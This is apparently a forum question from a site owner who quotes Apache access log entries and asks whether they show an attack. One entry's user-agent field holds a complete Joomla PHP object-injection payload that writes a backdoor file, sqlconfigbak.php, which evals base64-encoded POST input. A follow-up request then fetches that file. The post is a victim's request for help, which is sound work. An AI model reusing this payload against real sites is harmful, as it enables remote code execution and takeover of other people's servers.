Apache access log entries on my site are typically like this one:
207.46.13.174 - - [31/Oct/2016:10:18:55 +0100] "GET /contact HTTP/1.1" 200 256 "-""Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 0.607 MISS 10.10.36.125:104 0.607
so you can see user-agent field there. But today I also found user-agent field used like this:
62.210.162.42 - - [31/Oct/2016:11:24:19 +0100] "GET / HTTP/1.1" 200 399 "-""}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:242:"file_put_contents($_SERVER["DOCUMENT_ROOT"].chr(47)."sqlconfigbak.php","|=|\x3C".chr(63)."php \x24mujj=\x24_POST['z'];if(\x24mujj!=''){\x24xsser=base64_decode(\x24_POST['z0']);@eval(\"\\\x24safedg=\x24xsser;\");}");JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}~Ů" 0.304 BYPASS 10.10.36.125:104 0.304Was this an attack? Next log entry appears to have successfully retrieved (code 200) file sqlconfigbak.php mentioned in the script. Although I cannot find the file in file system:
62.210.162.42 - - [31/Oct/2016:11:24:20 +0100] "GET //sqlconfigbak.php HTTP/1.1" 200 399 "http://www.googlebot.com/bot.html""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0.244 BYPASS 10.10.36.125:104 0.244
Please what was happening here?